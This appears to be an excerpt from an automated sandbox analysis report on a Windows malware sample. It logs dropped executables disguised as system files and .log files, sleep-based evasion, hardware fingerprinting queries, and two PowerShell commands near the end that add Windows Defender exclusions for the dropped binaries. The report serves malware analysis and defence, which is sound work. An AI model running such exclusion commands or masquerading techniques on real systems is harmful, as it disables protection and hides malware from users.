                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exe Memory allocated: 2E50000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exe Memory allocated: 1AF00000 memory reserve | memory write watch
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe Memory allocated: F90000 memory reserve | memory write watch
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe Memory allocated: 1AC30000 memory reserve | memory write watch
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Memory allocated: 1770000 memory reserve | memory write watch
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Memory allocated: 1B260000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe Memory allocated: 9F0000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe Memory allocated: 1A8A0000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exe Memory allocated: A90000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exe Memory allocated: 1A490000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe Thread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe Thread delayed: delay time: 922337203685477
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exe Thread delayed: delay time: 922337203685477
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 922337203685477
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe Thread delayed: delay time: 922337203685477
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 600000
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 599854
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 599734
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 599622
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 599512
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 3600000
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 599241
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 599109
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 598453
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 598156
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 597968
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 597093
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 596843
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 596625
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 596296
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 596015
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 595800
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 595562
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 595343
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 595195
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 594921
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 594531
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 594295
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 594155
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 593953
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 593812
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 593693
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 593562
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 593442
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 593297
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 593168
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 593062
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 592921
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 592807
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 592643
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 592492
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 592375
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 592156
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 591640
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 591433
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 591249
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 591140
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 591031
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 590907
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 590781
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 590666
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 590561
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 590452
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 590343
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 590223
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 590080
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 589953
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 589836
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 589734
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 589624
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 589515
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 589405
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 589235
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 588687
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 588468
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 588340
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 588234
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 588125
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 588015
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 587906
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 587794
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 587687
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 587577
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 587468
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 587358
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 587249
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 587082
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 586937
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 586790
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 586687
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 586567
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 586436
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 586137
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 585605
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 585437
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 585156
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Thread delayed: delay time: 584959
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1761
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1738
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2105
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1881
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1815
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Window / User API: threadDelayed 9441
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe Dropped PE file which has not been started: C:\Users\user\Desktop\JNOIyhEg.log
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe Dropped PE file which has not been started: C:\Users\user\Desktop\syOLALyL.log
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe Dropped PE file which has not been started: C:\Users\user\Desktop\urdulIjK.log
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Dropped PE file which has not been started: C:\Users\user\Desktop\SVvXiHdY.log
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Dropped PE file which has not been started: C:\Users\user\Desktop\lniDCMno.log
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe Dropped PE file which has not been started: C:\Users\user\Desktop\WepxKXjB.log
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Dropped PE file which has not been started: C:\Users\user\Desktop\rxSvtOmf.log
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Dropped PE file which has not been started: C:\Users\user\Desktop\QgDirqoj.log
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Dropped PE file which has not been started: C:\Users\user\Desktop\hFbfZzNA.log
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe Dropped PE file which has not been started: C:\Users\user\Desktop\LHRZphiV.log
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ujtbHYJE.log
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe Dropped PE file which has not been started: C:\Users\user\Desktop\dUteJCDk.log
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Dropped PE file which has not been started: C:\Users\user\Desktop\NidZFKNk.log
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Dropped PE file which has not been started: C:\Users\user\Desktop\AIflJiPS.log
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe Dropped PE file which has not been started: C:\Users\user\Desktop\PxIPwdiO.log
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe Dropped PE file which has not been started: C:\Users\user\Desktop\CeJjFnSo.log
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Dropped PE file which has not been started: C:\Users\user\Desktop\zaakdHBM.log
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe Dropped PE file which has not been started: C:\Users\user\Desktop\fePfJVil.log
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Dropped PE file which has not been started: C:\Users\user\Desktop\rWndvGZf.log
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeDropped PE file which has not been started: C:\Users\user\Desktop\npUmXvsj.logJump to dropped file
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeDropped PE file which has not been started: C:\Users\user\Desktop\bZqOSDZv.logJump to dropped file
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeDropped PE file which has not been started: C:\Users\user\Desktop\kIKeCfec.logJump to dropped file
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeDropped PE file which has not been started: C:\Users\user\Desktop\qaACfJCc.logJump to dropped file
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeDropped PE file which has not been started: C:\Users\user\Desktop\iuTVQPCp.logJump to dropped file
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeDropped PE file which has not been started: C:\Users\user\Desktop\KpOqUOcm.logJump to dropped file
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeDropped PE file which has not been started: C:\Users\user\Desktop\zNoaAjFw.logJump to dropped file
Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe; TID: 7440; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; TID: 5468; Thread sleep count: 1761 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; TID: 7532; Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; TID: 5144; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; TID: 7212; Thread sleep count: 1738 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; TID: 7560; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; TID: 2144; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; TID: 1432; Thread sleep count: 2105 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; TID: 7564; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; TID: 3120; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; TID: 7216; Thread sleep count: 1881 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; TID: 7612; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; TID: 8064; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; TID: 1620; Thread sleep count: 1815 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; TID: 7568; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; TID: 4144; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe; TID: 6104; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe; TID: 5716; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Windows NT\smartscreen.exe; TID: 3604; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Windows NT\smartscreen.exe; TID: 7808; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe; TID: 7336; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe; TID: 3140; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe; TID: 4888; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe; TID: 6904; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe; TID: 1308; Thread sleep time: -30000s >= -30000s
Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe; TID: 7536; Thread sleep time: -31359464925306218s >= -30000s
Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe; TID: 2312; Thread sleep time: -25200000s >= -30000s
Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe; TID: 6956; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe; TID: 2120; Thread sleep time: -30000s >= -30000s
Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe; TID: 8040; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Windows NT\smartscreen.exe; TID: 4456; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe; TID: 6300; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe; TID: 6792; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe; TID: 3864; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Windows NT\smartscreen.exe; TID: 3396; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe; File opened: PhysicalDrive0
Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe; WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe; WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe; WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe; WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE; Last function: Thread delayed
Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe; File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe; File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Windows NT\smartscreen.exe; File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe; File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe; File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe; Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe; Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows NT\smartscreen.exe; Thread delayed: delay time: 922337203685477
Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe; Thread delayed: delay time: 922337203685477
Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe; Thread delayed: delay time: 922337203685477
Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe; Thread delayed: delay time: 30000
Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe; Thread delayed: delay time: 3600000
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 592156
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 591640
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 591433
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 591249
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 591140
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 591031
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 590907
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 590781
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 590666
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 590561
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 590452
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 590343
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 590223
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 590080
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 589953
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 589836
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 589734
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 589624
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 589515
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 589405
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 589235
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 588687
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 588468
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 588340
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 588234
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 588125
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 588015
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 587906
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 587794
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 587687
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 587577
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 587468
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 587358
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 587249
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 587082
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 586937
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 586790
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 586687
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 586567
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 586436
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 586137
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 585605
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 585437
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 585156
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 584959
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeThread delayed: delay time: 922337203685477
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile opened: C:\Users\user
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile opened: C:\Users\user\Documents\desktop.ini
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile opened: C:\Users\user\AppData
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile opened: C:\Users\user\AppData\Local\Temp
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile opened: C:\Users\user\Desktop\desktop.ini
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile opened: C:\Users\user\AppData\Local
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, 00000000.00000002.1800732292.000000001B93A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information queried: ProcessInformation
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeProcess token adjusted: Debug
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeProcess token adjusted: Debug
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeProcess token adjusted: Debug
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeMemory allocated: page read and write | page guard

                            HIPS / PFW / Operating System Protection Evasion

                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe'
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows sidebar\Gadgets\services.exe'
